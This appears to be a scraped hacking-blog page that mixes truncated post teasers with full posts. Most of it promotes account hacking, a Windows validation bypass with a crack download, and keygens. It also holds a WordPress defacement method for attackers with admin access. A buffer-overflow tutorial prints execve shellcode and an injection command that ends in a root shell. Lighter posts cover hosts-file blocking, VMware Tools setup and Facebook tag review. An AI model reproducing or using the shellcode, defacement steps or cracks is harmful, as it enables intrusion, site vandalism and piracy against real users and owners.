Hello friends welcome back today i will tell you another Facebook account password hacking with a Firefox addon Firesheep. Do you know th...
How To Make Your Own USB Stealer | Steal Password Using Pendrive
We Do use Pendrive/Usb Storage Device for different purpose but i am really interested in hacking friends password using USB Storage device ...
Hack Facebook | G-Mail | Yahoo| Orkut Account Id Password Using Backtrack 5 Operating System
Hello friends I am back with another hacking tutorial on hacking facebook |gmail|e-mail |orkut or any social network ing account hacking usi...
BSQL Hacker : automated SQL Injection Framework Tool
It's easy to use for beginners and provide great amount of customisation and automation support for experienced users. Features a nice m...
Few Best Hacking Movie | Geek Movies To Watch
Hello friends if you have some free time then you must watch these movies be coz movies plays vital role in learning many things :D... i doe...
How to Install Backtrack 5 On Motorola Xoom 2 (Rooted Device)
People asked me this how to install backtrack on mobile so here i demonstrate a small hand work with brief explanation it is really a funny ...
Home Page Hacking using IIS Exploit Using Windows 7 : Complete Tutorial With Screenshot
Hello Friends as few of our viewers ask in our previous post so i am putting a screen shot tutorial explaining IIS Exploit In Deep .:) IIS...
Hack Website With IIS Exploit :Simple And Most Easy Way To Hack Website
Ok Friends this is one of the very simple way to hack website even any beginners can do it .In IIS Method (Internet Information Server) Exp...
Top 10 Tips To Protect Your Computer From Hackers | Security tips
Well these days computers are now at every home next door.starting from children to elder every one is becoming friendly with computers and ...
Free Download Idm (Internet Download Manager) 6.07 Full Version With Keygen
Well friends i am just now recovering from fever so unable to post article for past around 5-6 dayz so feeling bit good now ... today i dec...
Meta Tags And Its Importance | Enabling Secret "Search Description Box"
Hello friends As You all Know that soon i am going to publish a small demo book On " Web Site Building And SEO " So here is a ...
Hacking E-Book For Those Who Want TO learn Hacking
Click Here to See and download them for free
This time i am posting a very famous book on hacking world ..this book is one of the revolutionary hacking learning book for beginner if you haven't downloaded it then go for this book one of the finest book for hacking learning also given with pictorial description so must download and see ..start hacking today :).
Book Name :The Hackers Underground Handbook E-book
Contents of this Book
A.Introduction.....5
1. How can I use this eBook?
2. What is a hacker
3. Hacker Hierarchy
4. What does it take to become a hacker?
5. Disclaimer
B. Programming.....9
1. Do I really need it?
2. Where should I start?
3. Best way to learn
C.Linux...12
1. What is it?
2. Choosing a distribution
3. Running Linux
4. Learning Linux
D. Passwords.....33
1. Password Cracking
2. Phishing
3. Countermeasures
4. More Programs
E. Network Hacking........48
1. Foot printing
2. Port Scanning
3. Banner Grabbing
4. Searching for Vulnerabilities
5. Penetrating
6. Countermeasures
F. Wireless Hacking...........70
1. Scanning for Wireless Networks
2. Cracking WEP
3. Packet Sniffing
4. Countermeasures
G. Windows Hacking....79
1. NetBIOS
2. Cracking Windows Passwords
3. Countermeasures
H. Malware....93
1. Definitions
2. ProRat
3. Countermeasures
I. Web Hacking...104
1. Cross Site Scripting
2. Remote File Inclusion
3. Local File Inclusion
J. Conclusion...114
1. Congratulations
2. Keep Learning
3. www.MrCracker.com
Download the hackers underground handbook pdf
(click On Download image Box to download):
Make A Share Help others(yours friends) to Learn new Things Thank You.
Hello Friends As i have already posted few good hacking learning book on my previous post. Click Here to See and download them for free ...
Control Your Music Player On Windows Using Physical Hand Gesture
Well if you are looking for some software that will work on your hand gesture and you can control it from a distance without mouse or keyboard then let me make you introduce to one of the small software known as "flutter"
Flutter is a small application (3.28 Mb) that is designed to control your music play and pause option on music paler with hand gesture recognizable.
as it is on developing stage it works on few selected media paler like... iTunes,Window media player,winamp...etc
Its a freeware program available to every one so i personally suggest you all must use it.
However some Disadvantage that i found using this tool is:
Its working fine on windows 7 also it is designed for mac users.
Get it From here
Thanks do like + share + comments :)
Every one Used to listen music while working on pc.Many time we prefer to just play a song and do our usual stuff on pc.but some time u get ...
Wyse PocketCloud :Work On Your PC From Anywhere in the world Using your Smart Phone
Well, don't panic for it now, because we have the solution for it with a Android apps known as Wyse PocketCloud Remote, you can simply “dial” in to your home computer, from your Android phone or tablet, and send the file as an attachment.
It works with Windows – via Remote Desktop – and also on Mac and Linux machines that have a VNC-based server installed. It might sound like mumbo jumbo, but if you’ve ever needed to get files off a computer, or access one remotely, it can be a lifesaver.
Wyse PocketCloud Remote
FORMAT: AndroidPRICE: Free
WHERE TO GET IT : Google Play
Of course, the biggest problem with an remote desktop app is that you need the target machine to be turned on. There are some technologically advanced ways of doing this, but it’s a lot easier if you leave your machine on. We do this, because our desktop PC acts as a media server in the evenings and is in use as a business computer for most of the day.
What Wyse PocketCloud does, is allow you to access any Windows Vista or 7 machine that has the RDP server available. The bad news is, this only applies to Windows 7 Ultimate and some of the business versions of the OS. If you don’t have RDP built-in, then there are VNC servers available that work nearly as well.
Some time You went to your workplace,leaving behind crucial presentation file ,which is sat on your home computer waiting to have its day in...
How To Make Windows XP Genuine | Removing Genuine Validation
Hello friends some time Xp user face a problem regarding genuineness showing message at start up Of os or even face problem while installing some Software(Like Microsoft security essential antivirus).So if you are having any such problem in your XP Box then here is the solution for you .
The Procedure that i am going to discuss will allow you to bypass the Microsoft Genuine Validation.
I hope this is the best way to make your copy of windows xp geniune :D.
follow these simple steps
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows NT\CurrentVersion\WPAEvents\OOBETimer
and double click on it. Then change some of the value data to any thing of you r wish.
Now you can download all the updates without activating, and the Genuine Microsoft Validation will irritate you No more.
Note: This works better after reformatting.
Or else do you want to download the crack for XP,XP home,XP 2 and Vista, I am placing it in a zip folder pls download it from the below link
http://rapidshare.com/files/71090926/Crack_For_XP.rar
Do comments,make share,Like Us on Facebook Subscribe Us For Daily Updates Thank you .
Make your Windows XP with Service Pack 2 geniune. Im not sure if this works on SP3. Hello friends some time Xp user face a problem regardin...
How to Block And Unblock Internet Websites
Website Building and SEO " within next week i will post its demo copy to all.
Come to today's topic...we will discuss how to block and Unblock Internet internet.
This is actually a very cool trick that i have learn during my B.tech first year days.
Let me give a brief discussion why we need it.
Many peoples actually parents wants their child to stay away from the porn world of internet.Also Some time its become very much Necessary Block or Unblock internet website on our computers for one or many reason.Here is the simple steps by following them you can easily block any website that you wants to or even unblock it by same procedure.
Procedure to block an unblock internet sites
Example
www.sifymall.com
To know ip of the sifymail.com goto cmd promt (window key +R)and type
ping www.sifymail.com
You will get like this image below
Get the ip and just use it on the "hosts" file as mentioned on the steps.
For window7 seven users you have to open the hosts file with administrative permissions (which can be easily achieve using right click on hosts file and choosing administrative permissions to open it )
and then follow that simple steps and yeh ..you have successfully block the site.
127.0.0.1 localhost
210.210.19.82 www.sifymall.com
Now
Sifymall is now unaccessable . For every site after that you want block , just add "1" to the last number in the internal ip (127.0.0.2) and then the add like before.
To Unblock the site again follow the same steps and remove the ip entry on the hosts file you have successfully unblock the site.
Thank For Visiting keep tuned to get daily updates.
Hi Mates!!! after a ten day break i am again back to action this time we will enjoy a lot with many hacking tutorials and don't forget t...
Independence Day Special Awesome CSS and JQuery Sliding wallpaper Html Effect | Special Offer
Let Me First Wish You all Happy Independence Day To all in Advance from core of the heart.
The Independence Day of any country is a moment of pride and glory.
At the strike of midnight of the August 15, 1947, India shook off the shackles of British Rule and became free.The Day That Gave Us The Freedom Of Thought, Action, Faith and Speech……….HAPPY INDEPENDENCE DAY…………So Lets celebrate.
Here is One of the awesome Slider of independence Day with wallpaper and Message for Inspiration to all.You can change images in source code, just replace images url with your own images,Change the message, position you can use this awesome slider on your websites blogs and deface Pages .
Proud to Be an Indian,Sare Jahan se accha Hindustan Hamara! vandhe mataram
Demo:Click here to See
Source Code : Click Here
Credit Goes to M1NH4LM3HD1
::Independence day Special Offer::
Well Friends There a special offer for you all that One of the leading Information Security Company Innobuzz Knowledge Solutions Is providing Buy One Get One Offer(Offer Valid till August 15 As Globally) On their distance Ethical Hacking Learning Kit.The Program covers all aspects of Information Security and Ethical Hacking, enabling one to become an Information Security Expert..: Global Presence in 23 Countries!
So As we Know that future Is INTERNET There is no escape Beyond it.So Its A Nice Proposal Order for 2 Distance Learning Kit @price Of one Be A CISE (Certified Information Security Expert).It will help you a lot in Future in getting Job As well As Getting Some Knowledge on Ethical Hacking Or learn Hacking.
Here are some Links, which will come in handy:
Recent Openings for Ethical Hackers in 2012 :Darksitelink1
Darksitelink2
For More About Innobuzz visit their Website http://www.innobuzz.in/
You can download course outline, along with other detail Here
Contact: DLP Inquiry: 0-9953749101,
(0)9953749101, 1800 103 2201.
Offer Valid till 15th August 2012.
Soon I will Be writing a review on Innobuzz Knowledge Solutions Distance Learning Kit DLP.And Don't forget to give reference Darksite.in :)
Make a share Among Your Friends ,Like us ,Help others to learn.
On 15 August 1947, India attained freedom from the British Rule.We all Indian celebrate this day as Independence day in India. Let Me First...
Quick Tips About Wordpress Defacing !
Wordpress Defacing without uploading Shell
usually after gaining admin acess on wordpress website we upload shell on website, its takes some extra time, even you can deface wordpress's index page without uploading shell !
Goto wordpress dashboard than theme editor and you'll see 2-3 thmes there like twenty ten and twenly eleven.
Look there for active Theme on That website and edit index.php of that theme. and you'll see your deface pages on website's home Page.
Bypassing Permission Denided for index.php in wordpress
sometimes after upload shell on wordpress website when you'll try to replace index.php's socurce code in public_html/ directory with you deface page, it will show error like permission denided, can't write in file etc, and sometimes permission change dones't work, then follow the same method whic is give above, change active theme's index.php file and home will chnage with your deface page.
About The author :
Minhal Mehdi is a ethcial Hacker, Blogger and SEO, visit his website Devils's Cafe for Website Hacking Tutorials.
Thanks Make a Share Keep Learning
hi Mates ! here are some quick tips about wordpress defacing, you should know it. it may be helpfull for you in wordpress defacing. Word...
How To Install VMware Tools in BackTrack
As we all know there exist two version of backtrack Gnome And KDE.
Note :In GNOME VMware image of BackTrack has VMware Tools installed by default So No need to experiment on it.
In KDE Version:
My way On installation is quite simpler although you can follow tradition way to install it Which i will be discussing later.
The Steps Are:
Go to Installed Backtrack On VMware On the Top of menu bar Virtual Machine -> Install VMware Tools.
Now After that follow this simple commands as discussed In screen shot See that and follow it keep things simple and clear.
General Way to install VMware tool
Backtrack 5 R2
KDE Users, please run the following command before installing VMWare tools on BackTrack 5 R2: root@bt:~# mkdir /etc/cups/ppd
root@bt:~# mkdir /mnt/cdrom; mount /dev/cdrom /mnt/cdrom
root@bt:~# cp /mnt/cdrom/VMwareTools-<version>.tar.gz /tmp/
root@bt:~# cd /tmp/
root@bt:~# tar zxpf VMwareTools-<version>.tar.gz
root@bt:~# cd vmware-tools-distrib/
root@bt:~# ./vmware-install.pl
After this a series of questions It will be done .
Backtrack 5 R1
Here you need to manually install the VMware Tools you first have to prepare your kernel source by issuing the following commands:root@bt:~# ln -s /usr/src/linux /lib/modules/2.6.39.4/build
Rest Command Follow as Above mentioned in BT5R2
WHEN ASKED IF YOU WANT THE SCRIPT TO RUN VMWARE-CONFIG-TOOLS.PL FOR YOU, SAY NO!
Tada Don't forget to restart your OS After Installation thats a good for the OS.
I am sure this tutorial would help you in installing VMware Tool.
Enjoy, If you face any problem then do comment share it thank you :)
Hello friends many People ask me that they are facing problem in installing VMware tools After installation of backtrack well its a very sim...
Weak Randomness in Android 4.0.4 DNS Poisoning Vulnerability
New Version of Android Is found to be vulnerable to DNS poisoning due to weak randomness in its implementation. Researchers Roee Hay & Roi Saltzman from IBM Application Security Research Group demonstrate that how an attacker can successfully guess the nonce of the DNS request with a probability thatis su cient for a feasible attack. Android version 4.0.4 and below are Vulnerable to this bug.
The main Weakness is due to the Android's 4.0 pseudo-random number generator (PRNG), which makes DNS poisoning attacks feasible.
Consequence of this vulnerability:
DNS poisoning attacks may endanger the integrity and confidentiality of the attacked system.This Attack may be utilized in Android for some serious approach such as, the Browser app can be attacked in order to steal the victim's cookies of a domain of the attacker's choice. If the attacker manages to lure the victim to browse to a web page controlled by him/her, the attacker can use JavaScript, to start resolving non-existing sub-domains.
Upon success, a sub-domain points to the attacker's IP, which enables the latter to steal wild card cookies of the attacked domain, and even set cookies. In addition, a malicious app instantiate the Browser app on the attacker's malicious web-page. If the attacker knows the PID (for example, a malicious app can access that information), the attack expected time can be reduced furthermore.
Vulnerability dubbed as "CVE-2012-2808" Android 4.1.1 has been released, and patches are available on AOSP. The random sample is now pulled from /dev/urandom, which should have adequate entropy by the time network activity occurs.
: Video Demonstration
Download the Detail Code and Report Here
New Version of Android Is found to be vulnerable to DNS poisoning due to weak randomness in its implementation. Researchers Roee Hay & ...
Where ? How To Begin For Hacking Learning And its Future Scope
Introduction :
Hello Friends Today I'm here to explain what basic hacking is and what you will need to know.Many people ask me they want to learn hacking but they don't know from "where to begin" and "how to start hacking?" ,"any institute to learn hacking?"
if you are asking so then then this is the right place for your solution.well as i said
If you're a good learner then you should be able to catch on quick.
I'm going to try and make this have great details attached so that everyone will grasp it easily and make this understand .
Let me discuss about Pros & Cons :
Pros
Some software companies will hire hackers to check for flaws in there programs
Free things
Learning
Adrenaline Rush
Cons
Possible jail time
Fines
BlackHat Hacking is Illegal
Take's some time to learn
Getting Started :
First things first.
There are 3 type of hackers you can choose from.
Black Hat, Gray Hat, and White Hat.
you can see my book for more details on it and some basic of hacking steps.
Becoming a Hacker :
You must learn information about any operating system and/or programming language, this way you have some skill in the required fields.
Learn PPython for a coding language because you can create advanced programs.
There is no such thing as learning a "Easy language", it takes time & patients to master your goals.
You will be able to learn computer security, also known as exploits.
Learn a Programming Language :
Python is a pretty decent language to start with because it has a clean design, very organized, and easy for beginners.Java is also good but some people do not value it as a good language to start off with.
If you are well into programming then you might want to learn C.
It's the closest language related to C++ and is to the core of Unix.
It's helps a lot when creating a software but takes time debugging and is often not used because of that reason.
Perl is also good learning for practice reasons and is worth learning.
Best source is to Use Google For hacking learn i always learn a lot from Google.
What's an Exploit :
An exploit is a piece of software and/or information that takes advantage of a bug or vulnerability in order to cause unintended behavior to occur on computer software.
This includes gaining control of a computer system or allowing privilege escalation or a denial-of-service attack.
Finding a bug can cause you to have further access into websites and software.
There are a bunch of methods on finding exploits.
The common found is a vulnerability in the creators software.
A remote exploit can work over a network and exploits the security vulnerabilities without access to the system.
A local exploit requires information before accessing the system.
It also increases the privileges of the person running the exploit past those by the system administrator.
Exploits clients also exist, usually using modified servers that send exploits when accessed with the clients application.
Exploits against applications requires some interaction with the user and is combined with a bit of social engineering.
This is part of the hackers way of gaining access into computers & websites for stealing information.
Earn Respect As a Hacker :
Program software & release it to the community with the source attached.
Design software that can be useful to everyone, this way users will download it & leave positive feedback.
Soon it will spread and you will start to become more known.
Test open-source software that users create.
If you can help them in any sort of way to make there software better & easy to use, I'm sure the creator will be thankful and mention you in the credits.
Try and find a program that is in the making.
Contact the creator and ask to beta-test it.
There's a good chance of you beta-testing it before it's released to the public.
You will also learn a lot this way and create good karma with others, so this way if you ever need help, they will offer you help as well.
Last but not least, give credit.
If you have had help in your current software than be sure to give credits.
Who knows, the person you're working with may give you a good ego.
Have fun!, Enjoy Happy Hacking.
What You Should Learn :
You can find many article tutorial here at darksite.in we always love to help this site is designed specially to make people learn Security/Hacking/Anti Hacking/use of tools/Tutorial/Latest Technology/Research stuff easily.I specially Thanks To Minhal.
Thank you Keep Learning stay tuned for new independence 15 August day special post.
Introduction : Hello Friends Today I'm here to explain what basic hacking is and what you will need to know.Many people ask me they w...
The Tales Of Buffer Overflow! Attack
Hope you peepz are having good time!
Well, this post of mine will be slightly a bit more technical, but anyways, do not cease reading the post at the moment if you aren't interested in technical stuff! :P
Who knows, what sounded interesting to me, might even be the same to you! :)
So, read on!
Let me just feed the main reason which made me start from reading one book, and then consistently moving on with other books of same sort!
I started with a basic book titled "Buffer Overflow (BoF)Attacks" , and that is when I came to understand the importance of Assembly language and then started reading some e-book at parallel on "Assembly Programming."
Not everything though, but the better understanding of BoF required me to have the info of atleast few opcodes, and directives like "x90", which is the instruction for the No Operation (NOP) code , ASCII conversions like "x41 - A", registers like "$esp", "$eip", "$ebp" , return addresses, and all related stuff!
By learning to deduce the return address of the program in the assembly language, I then was required to have knowledge about debugging the program to work out with the "fuzzing" technique.
-------------------------------------------------------------------------------
* Compiler used: GCC
* Disassembler used: GDB (GNU's Debugger)
---------------------------------------------------------------------------------
Now, fuzzing is something like that of application testing, where a tester passes different parameters to a program and checks if the program can get us the output which was not actually in the scope of its usage.
Probably, by fuzzing we generally check if the program has any BoF vulnerability which we can exploit later.
Now, after finding out the BoF vulnerability, next was to exploit that program for the output we desire.
Generally, we just exploit this for privilege escalation, which means that a guest/limited user account gains administrative privileges!
In linux, we may term it as ROOT privileges.
Coming back to the subject, the point is that for generating the exploit code for shell access, which we can say "Shell code", we need to just change the "return address" of the vulnerable program to that of a rootshell.
Gone blank? :P
No worries, I will provide an example of shell code address.
Its something like
"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x41\x41\x41\x41\x42\x42\x42\x42".
Suppose the address of root shell is as above, the concept of buffer overflow is as simple as changing the return address to that of shell code, and then execute the program.
Format:
itsmeRiF@MAAK:~/Desktop/testbof$ printf "
Example:
itsmeRiF@MAAK:~/Desktop/testbof$ printf "123456789abc\x48\xbc\xff\xbf\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x41\x41\x41\x41\x42\x42\x42\x42" | ./vulnerableProgramOutput:
itsmeRiF@MAAK:~/Desktop/testbof$
123456789abc�����������������������������//bin/sh
sh-2.04$
sh-2.04$
sh-2.04$
sh-2.04$ echo Every elite was once a n00b! Yes.. I am root!
Every elite was once a n00b! Yes.. I am root!
sh-2.04$
Now, as you can see above, lets presume that our vulnerable program accepts 12 bytes of character data before crashing, or say overflowing data.
Here, I have used "123456789abc" as the accepted string of characters.
Then, I just make the program point to the return address which is written in the little endian order.
Now, this means that the Least Significant Bit/Byte (LSB) (here, its byte) is written first with a prefix "x" and a suffix "\".
Then, after reaching the return address, I need to provide few NOP slides, so that the pointer doesn't move to any unknown address.
Practically, we need to provide so many NOP slides.
In the above example, I have managed with just 10 NOPs.
The NOPs tell the program to perform No Operation, by doing which we can have control over the address.
After the NOP slides, we inject the shell code, again in the little endian order.
Thats it!
We just execute this command / parameters in the vulnerable program, and whoa..we will be provided with a shell with root privileges!
This exploit which I have just shown, comes under the category "local" of type "Privilege escalation."
This means, if a guest user or an under-privileged / limited access user can execute this code, he will be promoted to an administrative level.
Well, I don't think so that this could be any simpler from my side, but anyways ...Rome was not built in a day! ;)
So, if you understand this concept, its well and good.. and in case if you don't, please have another few reads, and practicals! :)
Else leave a comment! :)
Uhm, thats all for now, will write soon, hopefully!
Until then, take care! :-)
Regards,
Arif (itsmeRiF)
About Author:
Arif Ali Khan,a B.Tech Final Year Student Computer Science Engineering.
Interested in ethical hacking, and network security and working on wireless cracking as part of his project.
Hello everyone! :) Hope you peepz are having good time! Well, this post of mine will be slightly a bit more technical, but anyways, do no...
Stop Unwanted Photo Tags In Facebook Timeline | Profile
Also Some of peoples in Facebook friendlist misuses the Facebook Photo tagging feature and tagged vulgur photos.
Facebook is very addictive social networks with lots of spammy applications and user’s.
We usually avoid spam’s but things get worse when someone misuse the Facebook Photo tagging feature for you.
So to help, prevent you from this problem we are making this article.
Somedays ago Facebook introduced a new feature to control and review the posts on Timeline. Timeline Review controls whether you have to manually approve posts you're tagged in before they go on your timeline. When you have a post to review, the Needs Review tab will appear on your timeline. This feature is Disabled by default and you have to Enable it. By Enabling this feature you will get an option to approve/disapprove posts you're tagged in before they go on your timeline.
You can Enable This Option by few simple steps:
step 1: Go to your Facebook Privacy Settings
step 2: Simple go to “Privacy Settings > Timeline and Tagging > Review posts friends tag you in before they appear on your Timeline” and Set “On” This option.
step 3:Below mentioned screen shots will help you in enabling this feature:
Click on Edit settings of Timeline and Tagging Option.
step 4: You will see an option “Review posts friends tag you in before they appear on your Timeline”, Now click on “Off” and set it to “On” to enable this feature for you.
Step 5:And Now Finally Enable this Feature.
After saving the changes if someone tag you on facebook then you will get Options to either Approve or Disapprove the posts. These posts will not visible on your Timeline until you manually approve them.I think for girls it would be very much helpful .
I hope this post will help you…
Stay Safe……..Hv gr8 day!
Very recently i have been having some conversation with my friends and they told me that in Facebook some people are making tag to them on t...